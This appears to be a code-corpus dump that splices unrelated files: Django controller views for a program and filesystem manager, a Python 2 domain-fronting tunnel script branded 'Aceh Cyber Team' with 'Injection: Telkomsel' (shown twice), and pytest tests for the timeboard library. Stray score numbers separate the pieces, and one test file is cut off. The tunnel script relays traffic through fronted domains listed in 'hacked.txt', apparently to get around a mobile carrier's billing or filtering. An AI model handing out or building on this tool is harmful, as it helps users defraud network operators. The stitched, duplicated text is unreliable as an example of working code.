return HttpResponseForbidden()
def program_log_enable(request, program_id):
"""
Processes an method invocation (log_enable) for an `ProgramModel`. (see
@frontend.controller.prog_log_enable)
HTTP Methods
------------
POST:
Notifies the `SlaveModel` to send logs for this `ProgramModel`.
Parameters
----------
request: HttpRequest
The request which should be processed.
Returns
-------
HttpResponse:
If the HTTP method is not supported, then an
`HttpResponseForbidden` is returned.
"""
if request.method == 'POST':
try:
program = ProgramModel.objects.get(id=program_id)
prog_log_enable(program)
return StatusResponse.ok('')
except FsimError as err:
return StatusResponse(err)
except ProgramModel.DoesNotExist as err:
return StatusResponse(ProgramNotExistError(err, program_id))
else:
return HttpResponseForbidden()
def program_log_disable(request, program_id):
"""
Processes an method invocation (log_disable) for an `ProgramModel`. (see
@frontend.controller.prog_log_disable)
HTTP Methods
------------
POST:
Notifies the `SlaveModel` to stop the sending process for logs
for this `ProgramModel`.
Parameters
----------
request: HttpRequest
The request which should be processed.
Returns
-------
HttpResponse:
If the HTTP method is not supported, then an
`HttpResponseForbidden` is returned.
"""
if request.method == 'POST':
try:
program = ProgramModel.objects.get(id=program_id)
prog_log_disable(program)
return StatusResponse.ok('')
except FsimError as err:
return StatusResponse(err)
except ProgramModel.DoesNotExist as err:
return StatusResponse(ProgramNotExistError(err, program_id))
else:
return HttpResponseForbidden()
def script_set(request):
"""
Process requests on a set of `ScriptModel`s.
HTTP Methods
------------
POST:
Adds a new `ScriptModel` to the database.
Parameters
----------
request: HttpRequest
The request which should be processed.
Returns
-------
HttpResponse:
If the HTTP method is not supported, then an
`HttpResponseForbidden` is returned.
"""
if request.method == 'POST':
return script_put_post(request.body.decode('utf-8'), None)
else:
return HttpResponseForbidden()
def script_entry(request, script_id):
"""
Process requests for a single `ScriptEntry`s.
HTTP Methods
------------
GET: query (with ?slaves=int&programs=int&filesystem=int)
Returns this `ScriptModel` as a JSON encoded string where
`SlavesModel`, `ProgramModel` and `FilesystemModel` encoded as str
or int (specified by &slaves=str, &programs=str, &filesystem=str).
DELETE:
Removes the specified entry (in the URL) from the database.
PUT:
Updates the specified entry (in the URL) in the database.
Parameters
----------
request: HttpRequest
The request which should be processed.
Returns
-------
HttpResponse:
If the HTTP method is not supported, then an
`HttpResponseForbidden` is returned.
"""
if request.method == 'GET':
try:
# adds ?slaves=int&program_key=int&filesystem_key=int to the URL
# to allow a dynamic format for the json string
slave_key = request.GET.get('slaves', 'int')
program_key = request.GET.get('programs', 'int')
filesystem_key = request.GET.get('filesystems', 'int')
script = Script.from_model(
script_id,
slave_key,
program_key,
filesystem_key,
)
return StatusResponse.ok(dict(script))
except FsimError as err:
return StatusResponse(err)
except ScriptModel.DoesNotExist as err:
return StatusResponse(ScriptNotExistError(err, script_id))
elif request.method == 'PUT':
return script_put_post(request.body.decode('utf-8'), int(script_id))
elif request.method == 'DELETE':
try:
ScriptModel.objects.get(id=script_id).delete()
return StatusResponse.ok('')
except ScriptModel.DoesNotExist as err:
return StatusResponse(ScriptNotExistError(err, script_id))
else:
return HttpResponseForbidden()
def script_copy(request, script_id):
"""
Processes an method invocation (copy) for an `ScriptModel`. (see
@frontend.controller.script_copy)
HTTP Methods
------------
POST:
Invokes the method for the `ScriptModel` (which is
specified in the URL).
Parameters
----------
request: HttpRequest
The request which should be processed.
Returns
-------
HttpResponse:
If the HTTP method is not supported, then an
`HttpResponseForbidden` is returned.
"""
if request.method == 'POST':
try:
script = ScriptModel.objects.get(id=script_id)
script_deep_copy(script)
return StatusResponse.ok('')
except ScriptModel.DoesNotExist as err:
return StatusResponse(ScriptNotExistError(err, script_id))
else:
return HttpResponseForbidden()
def script_run(request, script_id):
"""
Processes an method invocation (run) for an `ScriptModel`. (see
@frontend.controller.script_run)
HTTP Methods
------------
POST:
Invokes the method for the `ScriptModel` (which is
specified in the URL).
Parameters
----------
request: HttpRequest
The request which should be processed.
Returns
-------
HttpResponse:
If the HTTP method is not supported, then an
`HttpResponseForbidden` is returned.
"""
if request.method == 'POST':
try:
script = ScriptModel.objects.get(id=script_id)
# only allow the start of a script if the old one is finished
script_running = ScriptModel.objects.filter(
is_running=True, is_initialized=True).exists()
if not script_running:
FSIM_CURRENT_SCHEDULER.start(script.id)
FSIM_CURRENT_SCHEDULER.notify()
return StatusResponse.ok('')
else:
return StatusResponse(ScriptRunningError(str(script.name)))
except ScriptModel.DoesNotExist as err:
return StatusResponse(ScriptNotExistError(err, script_id))
else:
return HttpResponseForbidden()
def script_stop(request):
"""
Processes an method invocation (stop) for a `ScriptModel` (see
@frontend.sheduler.stop_loop)
HTTP Methods
------------
POST:
Invokes the method for the `ScriptModel`
Parameters
----------
request: HttpRequest
The request which should be processed.
Returns
-------
HttpResponse:
If the HTTP method is not supported, then an
`HttpResponseForbidden` is returned.
"""
if request.method == 'POST':
FSIM_CURRENT_SCHEDULER.stop()
FSIM_CURRENT_SCHEDULER.notify()
return StatusResponse.ok('')
else:
return HttpResponseForbidden()
def script_set_default(request, script_id):
"""
Processes an method invocation (set_default) for a `ScriptModel`.
HTTP Methods
------------
POST:
Invokes the method for the `ScriptModel` (which is
specified in the URL).
Parameters
----------
request: HttpRequest
The request which should be processed.
Returns
-------
HttpResponse:
If the HTTP method is not supported, then an
`HttpResponseForbidden` is returned.
"""
if request.method == 'POST':
ScriptModel.set_last_started(script_id)
return StatusResponse.ok('')
else:
return HttpResponseForbidden()
def filesystem_set(request):
"""
Process requests on a set of `FilesystemModel`s.
HTTP Methods
------------
POST:
Adds a new `FilesystemModel` to the database.
GET: query with (?q=None)
Searches for the name which is like ".*q.*"
GET: query with (?slave=None&is_string=False)
Searches for all `FilesystemModel`s which belong to the given `slave`.
Where `is_string` specifies if the given `slave` is an unique name or
and unique index.
Parameters
----------
request: HttpRequest
The request which should be processed.
Returns
-------
HttpResponse:
If the HTTP method is not supported, then an
`HttpResponseForbidden` is returned.
"""
if request.method == 'POST':
form = FilesystemForm(request.POST or None)
if form.is_valid():
filesystem = form.save(commit=False)
filesystem.slave = form.cleaned_data['slave']
try:
filesystem.full_clean()
# IMPORTANT: remove trailing path seperator (if not the query
# will not work [the query in filesystem_move])
filesystem.destination_path = up.remove_trailing_path_seperator(
filesystem.destination_path)
filesystem.source_path = up.remove_trailing_path_seperator(
filesystem.source_path)
form.save()
return StatusResponse.ok("")
except ValidationError as err:
LOGGER.warning(
"Error while adding filesystem `%s`: %s",
filesystem.name,
err,
)
string = err.message_dict['__all__'][0]
if 'Source path' in string and 'Destination path' in string and 'Slave' in string:
error_msg = 'Filesystem with this source path and destination path already exists on this Client.'
error_dict = {
'source_path': [error_msg],
'destination_path': [error_msg],
}
elif 'Name' in err.message_dict['__all__'][0] and 'Slave' in err.message_dict['__all__'][0]:
error_dict = {
'name': [
'Filesystem with this Name already exists on this Client.'
]
}
return StatusResponse.err(error_dict)
else:
return StatusResponse.err(form.errors)
elif request.method == 'GET':
query = request.GET.get('q', None)
slave = request.GET.get('slave', None)
slave_str = request.GET.get('is_string', False)
if query is not None:
filesystems = FilesystemModel.objects.filter(
name__contains=query).values_list(
"name",
flat=True,
)
elif slave is not None:
if slave_str:
slave_str = convert_str_to_bool(slave_str)
try:
slave = SlaveModel.from_identifier(slave, slave_str)
except FsimError as err:
return StatusResponse(err)
except SlaveModel.DoesNotExist as err:
return StatusResponse(SlaveNotExistError(err, slave))
filesystems = FilesystemModel.objects.filter(
slave=slave).values_list(
"name",
flat=True,
)
else:
filesystems = FilesystemModel.objects.all().values_list(
"name",
flat=True,
)
return StatusResponse.ok(list(filesystems))
else:
return HttpResponseForbidden()
def filesystem_move(request, filesystem_id):
"""
Processes an method invocation (move) for an `FilesystemModel`. (see
@frontend.controller.filesystem_move)
HTTP Methods
------------
POST:
Invokes the method for the `FilesystemModel` (which is
specified in the URL).
Parameters
----------
request: HttpRequest
The request which should be processed.
Returns
-------
HttpResponse:
If the HTTP method is not supported, then an
`HttpResponseForbidden` is returned.
"""
if request.method == 'POST':
try:
filesystem = FilesystemModel.objects.get(id=filesystem_id)
try:
fs_move(filesystem)
return StatusResponse(Status.ok(""))
except FsimError as err:
return StatusResponse(err)
except FilesystemModel.DoesNotExist as err:
return StatusResponse(FilesystemNotExistError(err, filesystem_id))
else:
return HttpResponseForbidden()
def filesystem_restore(request, filesystem_id):
"""
Processes an method invocation (restore) for an `FilesystemModel`. (see
@frontend.controller.filesystem_restore)
HTTP Methods
------------
POST:
Invokes the method for the `FilesystemModel` (which is
specified in the URL).
Parameters
----------
request: HttpRequest
The request which should be processed.
Returns
-------
HttpResponse:
If the HTTP method is not supported, then an
`HttpResponseForbidden` is returned.
"""
if request.method == 'POST':
try:
filesystem = FilesystemModel.objects.get(id=filesystem_id)
try:
fs_restore(filesystem)
return StatusResponse(Status.ok(""))
except FsimError as err:
return StatusResponse(err)
except FilesystemModel.DoesNotExist as err:
return StatusResponse(FilesystemNotExistError(err, filesystem_id))
else:
return HttpResponseForbidden()
def filesystem_entry(request, filesystem_id):
"""
Process requests for a single `FilesystemModel`s.
HTTP Methods
------------
DELETE:
Removes the specified entry (in the URL) from the database.
PUT:
Updates the specified entry (in the URL) in the database.
Parameters
----------
request: HttpRequest
The request which should be processed.
Returns
-------
HttpResponse:
If the HTTP method is not supported, then an
`HttpResponseForbidden` is returned.
"""
if request.method == 'DELETE':
try:
filesystem = FilesystemModel.objects.get(id=filesystem_id)
try:
fs_delete(filesystem)
return StatusResponse.ok("")
except FsimError as err:
return StatusResponse(err)
except FilesystemModel.DoesNotExist as err:
return StatusResponse(FilesystemNotExistError(err, filesystem_id))
elif request.method == 'PUT':
# create form from a new QueryDict made from the request body
# (request.PUT is unsupported) as an update (instance) of the
# existing slave
try:
model = FilesystemModel.objects.get(id=filesystem_id)
form = FilesystemForm(QueryDict(request.body), instance=model)
if form.is_valid():
filesystem = form.save(commit=False)
try:
filesystem.full_clean()
form.save()
return StatusResponse.ok('')
except ValidationError as _:
error_dict = {
'name': [
'Filesystem with this Name already exists on this Client.'
]
}
return StatusResponse(Status.err(error_dict))
else:
return StatusResponse(Status.err(form.errors))
except FilesystemModel.DoesNotExist as err:
return StatusResponse(FilesystemNotExistError(err, filesystem_id))
else:
return HttpResponseForbidden()
def scope_operations(request):
"""
Process requests to shutdown all clients
HTTP Methods
------------
POST:
Stops all programs, resets the filesystem and shuts down every client
Parameters
----------
request: HttpRequest
The request which should be processed.
Returns
-------
HttpResponse:
If the HTTP method is not supported, then an
`HttpResponseForbidden` is returned.
"""
if request.method == 'POST':
FSIM_CURRENT_SCHEDULER.stop()
FSIM_CURRENT_SCHEDULER.notify()
t = ShutdownThread(request.POST['scope'])
t.start()
return StatusResponse.ok('')
else:
return HttpResponseForbidden()
class ShutdownThread(threading.Thread):
def __init__(self, scope):
threading.Thread.__init__(self)
self.scope = scope
def run(self): # pragma: no cover
s = sched.scheduler()
programs = ProgramModel.objects.all()
programs = filter(lambda x: x.is_running, programs)
delay = 0
for program in programs:
s.enter(delay, 2, prog_stop, argument=(program, ))
delay += 1
if self.scope == 'programs':
s.run()
return
filesystems = FilesystemModel.objects.all()
filesystems = filter(lambda x: x.is_moved, filesystems)
delay += 10
for filesystem in filesystems:
s.enter(delay, 1, fs_restore, argument=(filesystem, ))
if self.scope == 'filesystem':
s.run()
return
slaves = SlaveModel.objects.all()
slaves = filter(lambda x: x.is_online, slaves)
delay += 8
for slave in slaves:
s.enter(delay, 3, controller.slave_shutdown, argument=(slave, ))
delay += 1
if self.scope == 'clients':
s.run()
return
s.run()
if platform.system() == "Windows":
subprocess.run(['shutdown', '-s', '-t', '0'])
else:
subprocess.run(['shutdown', '-h now']) | 0.617859 | 0.119923 |
import os
import sys
import random
import socket
import select
import datetime
import threading
lock = threading.RLock(); os.system('cls' if os.name == 'nt' else 'clear')
def real_path(file_name):
return os.path.dirname(os.path.abspath(__file__)) + file_name
def filter_array(array):
for i in range(len(array)):
array[i] = array[i].strip()
if array[i].startswith('#'):
array[i] = ''
return [x for x in array if x]
def colors(value):
patterns = {
'R1' : '\033[31;1m', 'R2' : '\033[31;2m',
'G1' : '\033[32;1m', 'Y1' : '\033[33;1m',
'P1' : '\033[35;1m', 'CC' : '\033[0m'
}
for code in patterns:
value = value.replace('[{}]'.format(code), patterns[code])
return value
def log(value, status='', color='[G1]'):
value = colors('{color}[{time}] [CC]:: Ro0T {color}{status} [CC]:: {color}{value}[CC]'.format(
time=datetime.datetime.now().strftime('%H:%M:%S'),
value=value,
color=color,
status=status
))
with lock: print(value)
def log_replace(value, status='Ro0T N3T', color='[G1]'):
value = colors('{}{} ({}) [CC]\r'.format(color, status, value))
with lock:
sys.stdout.write(value)
sys.stdout.flush()
class inject(object):
def __init__(self, inject_host, inject_port):
super(inject, self).__init__()
self.inject_host = str(inject_host)
self.inject_port = int(inject_port)
def log(self, value, color='[G1]'):
log(value, color=color)
def start(self):
try:
socket_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket_server.bind((self.inject_host, self.inject_port))
socket_server.listen(1)
frontend_domains = open(real_path('/hacked.txt')).readlines()
frontend_domains = filter_array(frontend_domains)
if len(frontend_domains) == 0:
self.log('Frontend Domains not found. Please check hacked.txt', color='[R1]')
return
self.log('Welcome ACT\nLOCAL HOST : 127.0.0.1\nLOCAL PORT : 1234\nSCRIPT SIAP DIJALANKAN \nSILAHKAN BUKA PSIPHON!!!'.format(self.inject_host, self.inject_port))
while True:
socket_client, _ = socket_server.accept()
socket_client.recv(4096)
domain_fronting(socket_client, frontend_domains).start()
except Exception as exception:
self.log('Gagal!!!Coba Restar HP'.format(self.inject_host, self.inject_port), color='[R1]')
class domain_fronting(threading.Thread):
def __init__(self, socket_client, frontend_domains):
super(domain_fronting, self).__init__()
self.frontend_domains = frontend_domains
self.socket_tunnel = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket_client = socket_client
self.buffer_size = 9999
self.daemon = True
def log(self, value, status='N3T', color='[G1]'):
log(value, status=status, color=color)
def handler(self, socket_tunnel, socket_client, buffer_size):
sockets = [socket_tunnel, socket_client]
timeout = 0
while True:
timeout += 1
socket_io, _, errors = select.select(sockets, [], sockets, 3)
if errors: break
if socket_io:
for sock in socket_io:
try:
data = sock.recv(buffer_size)
if not data: break
# SENT -> RECEIVED
elif sock is socket_client:
socket_tunnel.sendall(data)
elif sock is socket_tunnel:
socket_client.sendall(data)
timeout = 0
except: break
if timeout == 60: break
def run(self):
try:
self.proxy_host_port = random.choice(self.frontend_domains).split(':')
self.proxy_host = self.proxy_host_port[0]
self.proxy_port = self.proxy_host_port[1] if len(self.proxy_host_port) >= 2 and self.proxy_host_port[1] else '443'
self.log('[CC]CONNECTING...!!!'.format(self.proxy_host, self.proxy_port))
self.socket_tunnel.connect((str(self.proxy_host), int(self.proxy_port)))
self.socket_client.sendall(b'HTTP/1.1 200 OK\r\n\r\n')
self.handler(self.socket_tunnel, self.socket_client, self.buffer_size)
self.socket_client.close()
self.socket_tunnel.close()
self.log('SUKSES 200 OK!!!'.format(self.proxy_host, self.proxy_port), color='[G1]')
except OSError:
self.log('Connection error', color='[CC]')
except TimeoutError:
self.log('{} not responding'.format(self.proxy_host), color='[CC]')
G = '\033[1;33m'
print G + 'FAST CONECT Aceh Cyber Team\n'
print(colors('\n'.join([
'[G1][!]Domain Frontin By Ro0T N3T','[CC]'
'[G1][!]Remode By :ACT','[CC]'
'[G1][!]Injection :Telkomsel Opok','[CC]'
'[G1][!]YouTube Chanel :Risky Channel','[CC]'
])))
def main():
D = ' [G1][!] MASUKKAN Anka 1'
like = '1'
user_input = raw_input(' [!] INPUT ANKA : ')
if user_input != like:
sys.exit(' [!] PASSWORD SALAH\n')
print ' [!] PASSWORD DI TERIMA\n'
inject('127.0.0.1', '8787').start()
if __name__ == '__main__':
main() | app.py | import os
import sys
import random
import socket
import select
import datetime
import threading
lock = threading.RLock(); os.system('cls' if os.name == 'nt' else 'clear')
def real_path(file_name):
return os.path.dirname(os.path.abspath(__file__)) + file_name
def filter_array(array):
for i in range(len(array)):
array[i] = array[i].strip()
if array[i].startswith('#'):
array[i] = ''
return [x for x in array if x]
def colors(value):
patterns = {
'R1' : '\033[31;1m', 'R2' : '\033[31;2m',
'G1' : '\033[32;1m', 'Y1' : '\033[33;1m',
'P1' : '\033[35;1m', 'CC' : '\033[0m'
}
for code in patterns:
value = value.replace('[{}]'.format(code), patterns[code])
return value
def log(value, status='', color='[G1]'):
value = colors('{color}[{time}] [CC]:: Ro0T {color}{status} [CC]:: {color}{value}[CC]'.format(
time=datetime.datetime.now().strftime('%H:%M:%S'),
value=value,
color=color,
status=status
))
with lock: print(value)
def log_replace(value, status='Ro0T N3T', color='[G1]'):
value = colors('{}{} ({}) [CC]\r'.format(color, status, value))
with lock:
sys.stdout.write(value)
sys.stdout.flush()
class inject(object):
def __init__(self, inject_host, inject_port):
super(inject, self).__init__()
self.inject_host = str(inject_host)
self.inject_port = int(inject_port)
def log(self, value, color='[G1]'):
log(value, color=color)
def start(self):
try:
socket_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket_server.bind((self.inject_host, self.inject_port))
socket_server.listen(1)
frontend_domains = open(real_path('/hacked.txt')).readlines()
frontend_domains = filter_array(frontend_domains)
if len(frontend_domains) == 0:
self.log('Frontend Domains not found. Please check hacked.txt', color='[R1]')
return
self.log('Welcome ACT\nLOCAL HOST : 127.0.0.1\nLOCAL PORT : 1234\nSCRIPT SIAP DIJALANKAN \nSILAHKAN BUKA PSIPHON!!!'.format(self.inject_host, self.inject_port))
while True:
socket_client, _ = socket_server.accept()
socket_client.recv(4096)
domain_fronting(socket_client, frontend_domains).start()
except Exception as exception:
self.log('Gagal!!!Coba Restar HP'.format(self.inject_host, self.inject_port), color='[R1]')
class domain_fronting(threading.Thread):
def __init__(self, socket_client, frontend_domains):
super(domain_fronting, self).__init__()
self.frontend_domains = frontend_domains
self.socket_tunnel = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket_client = socket_client
self.buffer_size = 9999
self.daemon = True
def log(self, value, status='N3T', color='[G1]'):
log(value, status=status, color=color)
def handler(self, socket_tunnel, socket_client, buffer_size):
sockets = [socket_tunnel, socket_client]
timeout = 0
while True:
timeout += 1
socket_io, _, errors = select.select(sockets, [], sockets, 3)
if errors: break
if socket_io:
for sock in socket_io:
try:
data = sock.recv(buffer_size)
if not data: break
# SENT -> RECEIVED
elif sock is socket_client:
socket_tunnel.sendall(data)
elif sock is socket_tunnel:
socket_client.sendall(data)
timeout = 0
except: break
if timeout == 60: break
def run(self):
try:
self.proxy_host_port = random.choice(self.frontend_domains).split(':')
self.proxy_host = self.proxy_host_port[0]
self.proxy_port = self.proxy_host_port[1] if len(self.proxy_host_port) >= 2 and self.proxy_host_port[1] else '443'
self.log('[CC]CONNECTING...!!!'.format(self.proxy_host, self.proxy_port))
self.socket_tunnel.connect((str(self.proxy_host), int(self.proxy_port)))
self.socket_client.sendall(b'HTTP/1.1 200 OK\r\n\r\n')
self.handler(self.socket_tunnel, self.socket_client, self.buffer_size)
self.socket_client.close()
self.socket_tunnel.close()
self.log('SUKSES 200 OK!!!'.format(self.proxy_host, self.proxy_port), color='[G1]')
except OSError:
self.log('Connection error', color='[CC]')
except TimeoutError:
self.log('{} not responding'.format(self.proxy_host), color='[CC]')
G = '\033[1;33m'
print G + 'FAST CONECT Aceh Cyber Team\n'
print(colors('\n'.join([
'[G1][!]Domain Frontin By Ro0T N3T','[CC]'
'[G1][!]Remode By :ACT','[CC]'
'[G1][!]Injection :Telkomsel Opok','[CC]'
'[G1][!]YouTube Chanel :Risky Channel','[CC]'
])))
def main():
D = ' [G1][!] MASUKKAN Anka 1'
like = '1'
user_input = raw_input(' [!] INPUT ANKA : ')
if user_input != like:
sys.exit(' [!] PASSWORD SALAH\n')
print ' [!] PASSWORD DI TERIMA\n'
inject('127.0.0.1', '8787').start()
if __name__ == '__main__':
main() | 0.103635 | 0.089733 |
import timeboard as tb
import datetime
import pytest
import pandas as pd
class TestVersion(object):
def test_version(self):
version = tb.read_from('VERSION.txt')
assert version == tb.__version__
class TestTBConstructor(object):
def test_tb_constructor_trivial(self):
clnd = tb.Timeboard(base_unit_freq='D',
start='01 Jan 2017', end='12 Jan 2017',
layout=[1])
assert clnd._timeline.labels.eq([1]*12).all()
assert clnd.start_time == datetime.datetime(2017, 1, 1, 0, 0, 0)
assert clnd.end_time > datetime.datetime(2017, 1, 12, 23, 59, 59)
assert clnd.end_time < datetime.datetime(2017, 1, 13, 0, 0, 0)
assert clnd.base_unit_freq == 'D'
def test_tb_constructor_empty_layout(self):
clnd = tb.Timeboard(base_unit_freq='D',
start='01 Jan 2017', end='12 Jan 2017',
layout=[],
)
assert clnd._timeline.labels.isnull().all()
assert clnd.start_time == datetime.datetime(2017, 1, 1, 0, 0, 0)
assert clnd.end_time > datetime.datetime(2017, 1, 12, 23, 59, 59)
assert clnd.end_time < datetime.datetime(2017, 1, 13, 0, 0, 0)
assert clnd.base_unit_freq == 'D'
def test_tb_constructor_empty_layout_with_default_label(self):
clnd = tb.Timeboard(base_unit_freq='D',
start='01 Jan 2017', end='12 Jan 2017',
layout=[],
default_label=100)
assert clnd._timeline.labels.eq([100]*12).all()
assert clnd.start_time == datetime.datetime(2017, 1, 1, 0, 0, 0)
assert clnd.end_time > datetime.datetime(2017, 1, 12, 23, 59, 59)
assert clnd.end_time < datetime.datetime(2017, 1, 13, 0, 0, 0)
assert clnd.base_unit_freq == 'D'
def test_tb_constructor_trivial_with_amendments(self):
clnd = tb.Timeboard(base_unit_freq='D',
start='01 Jan 2017', end='12 Jan 2017',
layout=[1],
amendments={'11 Jan 2017': 2,
'12 Jan 2017': 3})
assert clnd._timeline.labels.eq([1]*10 + [2,3]).all()
assert clnd.start_time == datetime.datetime(2017, 1, 1, 0, 0, 0)
assert clnd.end_time > datetime.datetime(2017, 1, 12, 23, 59, 59)
assert clnd.end_time < datetime.datetime(2017, 1, 13, 0, 0, 0)
assert clnd.base_unit_freq == 'D'
def test_tb_constructor_amendments_outside(self):
clnd = tb.Timeboard(base_unit_freq='D',
start='01 Jan 2017', end='12 Jan 2017',
layout=[1],
amendments={'31 Dec 2016': 2,
'12 Jan 2017': 3})
assert clnd._timeline.labels.eq([1]*11 + [3]).all()
assert clnd.start_time == datetime.datetime(2017, 1, 1, 0, 0, 0)
assert clnd.end_time > datetime.datetime(2017, 1, 12, 23, 59, 59)
assert clnd.end_time < datetime.datetime(2017, 1, 13, 0, 0, 0)
assert clnd.base_unit_freq == 'D'
def test_tb_constructor_bad_layout(self):
with pytest.raises(TypeError):
tb.Timeboard(base_unit_freq='D',
start='01 Jan 2017', end='12 Jan 2017',
layout=1)
def test_tb_constructor_duplicate_amendments(self):
with pytest.raises(KeyError):
tb.Timeboard(base_unit_freq='D',
start='01 Jan 2017', end='12 Jan 2017',
layout=[1],
amendments={'02 Jan 2017 12:00': 2,
'02 Jan 2017 15:15': 3})
def test_tb_constructor_bad_amendments(self):
with pytest.raises(TypeError):
tb.Timeboard(base_unit_freq='D',
start='01 Jan 2017', end='12 Jan 2017',
layout=[1],
amendments=[0])
def test_tb_constructor_trivial_selector(self):
clnd = tb.Timeboard(base_unit_freq='D',
start='01 Jan 2017', end='12 Jan 2017',
layout=[0, 1, 0, 2])
sdl = clnd.default_schedule
selector = clnd.default_selector
assert selector(clnd._timeline[1])
assert [selector(x) for x in clnd._timeline.labels] == [False, True] * 6
assert (sdl.on_duty_index == [1, 3, 5, 7, 9, 11]).all()
assert (sdl.off_duty_index == [0, 2, 4, 6, 8, 10]).all()
def test_tb_constructor_trivial_custom_selector(self):
def custom_selector(x):
return x>1
clnd = tb.Timeboard(base_unit_freq='D',
start='01 Jan 2017', end='12 Jan 2017',
layout=[0, 1, 0, 2],
default_selector=custom_selector)
sdl = clnd.default_schedule
selector = clnd.default_selector
assert not selector(clnd._timeline[1])
assert [selector(x) for x in clnd._timeline.labels] == [False, False,
False, True] * 3
assert (sdl.on_duty_index == [3, 7, 11]).all()
assert (sdl.off_duty_index == [0, 1, 2, 4, 5, 6, 8, 9, 10]).all()
class TestTBConstructorWithOrgs(object):
def test_tb_constructor_week5x8(self):
week5x8 = tb.Organizer(marker='W', structure=[[1, 1, 1, 1, 1, 0, 0]])
amendments = pd.Series(index=pd.date_range(start='01 Jan 2017',
end='10 Jan 2017',
freq='D'),
data=0).to_dict()
clnd = tb.Timeboard(base_unit_freq='D',
start='28 Dec 2016', end='02 Apr 2017',
layout=week5x8,
amendments=amendments)
assert clnd.start_time == datetime.datetime(2016, 12, 28, 0, 0, 0)
assert clnd.end_time > datetime.datetime(2017, 4, 2, 23, 59, 59)
assert clnd.end_time < datetime.datetime(2017, 4, 3, 0, 0, 0)
assert clnd.base_unit_freq == 'D'
assert clnd('28 Dec 2016').is_on_duty()
assert clnd('30 Dec 2016').is_on_duty()
assert clnd('31 Dec 2016').is_off_duty()
assert clnd('01 Jan 2017').is_off_duty()
assert clnd('10 Jan 2017').is_off_duty()
assert clnd('11 Jan 2017').is_on_duty()
assert clnd('27 Mar 2017').is_on_duty()
assert clnd('31 Mar 2017').is_on_duty()
assert clnd('01 Apr 2017').is_off_duty()
assert clnd('02 Apr 2017').is_off_duty()
class TestTimeboardSchedules(object):
def test_tb_add_schedule(self):
clnd = tb.Timeboard(base_unit_freq='D',
start='31 Dec 2016', end='12 Jan 2017',
#layout=[0, 1, 0, 0, 2, 0])
layout=['O', 'A', 'O', 'O', 'B', 'O'])
assert len(clnd.schedules) == 1
assert 'on_duty' in clnd.schedules
clnd.add_schedule(name='sdl1', selector=lambda x: x == 'B')
clnd.add_schedule(name='sdl2', selector=lambda x: x == 'C')
assert len(clnd.schedules) == 3
assert 'sdl1' in clnd.schedules
sdl1 = clnd.schedules['sdl1']
assert sdl1.name == 'sdl1'
assert not sdl1.is_on_duty(1)
assert sdl1.is_on_duty(4)
assert 'sdl2' in clnd.schedules
sdl2 = clnd.schedules['sdl2']
assert sdl2.name == 'sdl2'
assert not sdl2.is_on_duty(1)
assert not sdl2.is_on_duty(4)
assert clnd.default_schedule.name == 'on_duty'
assert clnd.default_schedule.is_on_duty(1)
assert clnd.default_schedule.is_on_duty(4)
def test_tb_drop_schedule(self):
clnd = tb.Timeboard(base_unit_freq='D',
start='31 Dec 2016', end='12 Jan 2017',
layout=[0, 1, 0, 0, 2, 0])
clnd.add_schedule(name='sdl', selector=lambda x: x > 1)
assert len(clnd.schedules) == 2
sdl = clnd.schedules['sdl']
clnd.drop_schedule(sdl)
assert len(clnd.schedules) == 1
with pytest.raises(KeyError):
clnd.schedules['sdl']
# object itself continues to exists while referenced
assert not sdl.is_on_duty(1)
def test_tb_schedule_names(self):
clnd = tb.Timeboard(base_unit_freq='D',
start='31 Dec 2016', end='12 Jan 2017',
layout=[0, 1, 0, 0, 2, 0])
clnd.add_schedule(name=1, selector=lambda x: x > 1)
assert len(clnd.schedules) == 2
assert clnd.schedules['1'].name == '1'
with pytest.raises(KeyError):
clnd.add_schedule(name='1', selector=lambda x: x > 2)
def test_tb_bad_schedule(self):
clnd = tb.Timeboard(base_unit_freq='D',
start='31 Dec 2016', end='12 Jan 2017',
layout=[0, 1, 0, 0, 2, 0])
with pytest.raises((ValueError, AttributeError)):
clnd.add_schedule(name='sdl', selector='selector')
with pytest.raises(TypeError):
clnd.add_schedule(name='sdl', selector=lambda x,y: x+y)
class TestTimeboardWorktime(object):
def test_tb_default_worktime_source(self):
clnd = tb.Timeboard(base_unit_freq='D',
start='31 Dec 2016', end='12 Jan 2017',
layout=[0, 1, 0, 0, 2, 0])
assert clnd.worktime_source == 'duration'
def test_tb_set_worktime_source(self):
clnd = tb.Timeboard(base_unit_freq='D',
start='31 Dec 2016', end='12 Jan 2017',
layout=[0, 1, 0, 0, 2, 0],
worktime_source='labels')
assert clnd.worktime_source == 'labels'
def test_tb_bad_worktime_source(self):
with pytest.raises(ValueError):
tb.Timeboard(base_unit_freq='D',
start='31 Dec 2016', end='12 Jan 2017',
layout=[0, 1, 0, 0, 2, 0],
worktime_source='bad_source')
#TODO: test timeboards with multiplied freqs
class TestTimeboardToDataFrame(object):
def test_timeboard_to_dataframe(self):
clnd = tb.Timeboard(base_unit_freq='D',
start='01 Jan 2017', end='12 Jan 2017',
layout=[0, 1, 0, 2])
clnd.add_schedule('my_schedule', lambda x: True)
df = clnd.to_dataframe()
assert len(df) == 12
# we are not hardcoding the list of columns here;
# however, there must be at least 5 columns: two showing the start
# and the end times of workshifts, one for the labels,
# and two for the schedules
assert len(list(df.columns)) >=5
assert 'my_schedule' in list(df.columns)
def test_timeboard_to_dataframe_selected_ws(self):
clnd = tb.Timeboard(base_unit_freq='D',
start='01 Jan 2017', end='12 Jan 2017',
layout=[0, 1, 0, 2])
df = clnd.to_dataframe(1, 5)
assert len(df) == 5
def test_timeboard_to_dataframe_reversed_ws(self):
clnd = tb.Timeboard(base_unit_freq='D',
start='01 Jan 2017', end='12 Jan 2017',
layout=[0, 1, 0, 2])
# This is ok. This way an empty df for a void interval is created.
df = clnd.to_dataframe(5, 1)
assert df.empty
def test_timeboard_to_dataframe_bad_locations(self):
clnd = tb.Timeboard(base_unit_freq='D',
start='01 Jan 2017', end='12 Jan 2017',
layout=[0, 1, 0, 2])
with pytest.raises(AssertionError):
clnd.to_dataframe(1, 12)
with pytest.raises(AssertionError):
clnd.to_dataframe(12, 1)
with pytest.raises(AssertionError):
clnd.to_dataframe(-1, 5)
with pytest.raises(AssertionError):
clnd.to_dataframe(5, -1) | timeboard/tests/test_timeboard.py | import timeboard as tb
import datetime
import pytest
import pandas as pd
class TestVersion(object):
def test_version(self):
version = tb.read_from('VERSION.txt')
assert version == tb.__version__
class TestTBConstructor(object):
def test_tb_constructor_trivial(self):
